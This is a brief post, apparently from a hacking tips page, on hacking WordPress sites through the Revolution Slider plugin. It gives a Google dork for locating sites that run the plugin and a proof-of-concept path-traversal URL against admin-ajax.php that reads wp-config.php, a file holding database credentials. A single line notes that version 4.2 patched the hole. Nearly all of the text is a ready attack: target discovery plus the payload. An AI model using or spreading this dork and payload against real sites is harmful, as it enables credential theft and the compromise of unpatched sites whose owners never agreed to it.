Hack WordPress site | Vulnerability in Revolution Slider

Dork: “Index of” /wp-content/plugins/revolution-slider/
POC: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

Note: Vulnerability was patched in version 4.2.